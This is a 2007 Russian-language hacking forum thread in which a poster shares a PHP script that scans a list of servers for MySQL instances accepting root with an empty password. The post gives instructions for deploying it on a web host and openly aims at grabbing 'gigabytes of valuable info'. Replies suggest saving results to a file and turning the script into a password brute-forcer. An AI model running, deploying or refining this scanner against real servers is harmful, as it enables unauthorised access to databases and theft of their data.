Сканер MySQL

Discussion in 'PHP' started by Rast1k, 9 Aug 2007.

  1. Rast1k

    Rast1k Banned

    Joined:
    9 Aug 2007
    Messages:
    39
    Likes Received:
    30
    Reputations:
    -75
    Хочу представить вашему вниманию сканер.
    Код сканера взят с inattack.ru (c)
    Code:
    <?
    set_time_limit(0);
    # берём список серверов для сканирования из файла servers.dat
    $servers=file("servers.dat");
    # получаем кол-во записей в файле
    $strings=count($servers);
    for($i=0; $i<$strings; $i++){
    $server=$servers[$i];
    # функция коннекта к базе, передаем переменную $server
    connect($server);
    }
    function connect($server)
    # а вот и сама функция подключения
    {
    # коннект к базе (сервер,"логин","пароль")
    $co=mysql_connect($server,"root","");
    # если подключится не удалось
    if(!($co))
    {
    echo "connect 2 server $server failed<br>";
    }
    # если подключились то выводим сообщение
    else
    {
    echo "connect 2 server $server success<br>";
    }
    }
    ?>
    
    
    Теперь обзываем этот скрипт sqlbrute.php и закидываем на сервак. После этого создаём файл servers.dat со
    списком адресов для сканирования и также аплоадим на сервер. После всего этого в браузере набиваем:
    www.ваш_сайт.ru/sqlbrute.php и получаем отчёт =)
    Возможно некоторые станут говорить что мол только лохи оставляют пустые пароли на базу данных и мол таких
    дебильных админов найти невозможно, но я основываясь на своём опыте могу вам сказать что таких админов
    достаточно много и кто ищет тот всегда найдёт.
    Ну вот и всё. Хорошего вам коннекта, пухлых баз данных и гигабайтов ценной инфы.
     
  2. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,362
    Likes Received:
    1,157
    Reputations:
    430
    Дэ, конечно...
    Хоть бы результат в файл писал... и если, уж на то пошло, то ignore_user_abort(); не помешал бы...
     
    #2 Ch3ck, 9 Aug 2007
    Last edited: 9 Aug 2007
  3. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    А нах ignore_user_abort(); , если вывод в браузер идет, а не в файл?
     
    _________________________
  4. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,362
    Likes Received:
    1,157
    Reputations:
    430
    Так я и написал, что надо вывод в файл делать а не в браузер. Закроешь и пистец результату.
     
  5. Rast1k

    Rast1k Banned

    Joined:
    9 Aug 2007
    Messages:
    39
    Likes Received:
    30
    Reputations:
    -75
    ignore_user_abort();
    Уважаемый, если вывод идет в браузер, то потеря последует только если у Вас кривые руки.
     
  6. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,362
    Likes Received:
    1,157
    Reputations:
    430
    Вот кто писал этот скрипт, тот криворукий.
    Представь, что в файле 10000000 ссылок. И подумай сколько они будет проверятся. Мне кажется удобнее, то закрыть браузер на это время. Потом я более чем уверен, что ты будешь делать копипаст из браузера, в файл. Тебе говорят как удобнее будет. И как правильнее.
     
    #6 Ch3ck, 9 Aug 2007
    Last edited: 9 Aug 2007
  7. Rast1k

    Rast1k Banned

    Joined:
    9 Aug 2007
    Messages:
    39
    Likes Received:
    30
    Reputations:
    -75
    Хорошо учту.
    Но в файле столько ссылок быть не может ;)
     
  8. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    насколько я помню, написал 1dt.w0lf_, но не столь важно. скрипт уже не актуален, ибо сервера MySQL очень редко оставляют с дефолтовым доступом root:пустой пароль.
    можно, конечно, его переделать так чтобы проводить брут, но на php сканирование будет проходить медленно, да и брутеров mysql много уже...
     
    1 person likes this.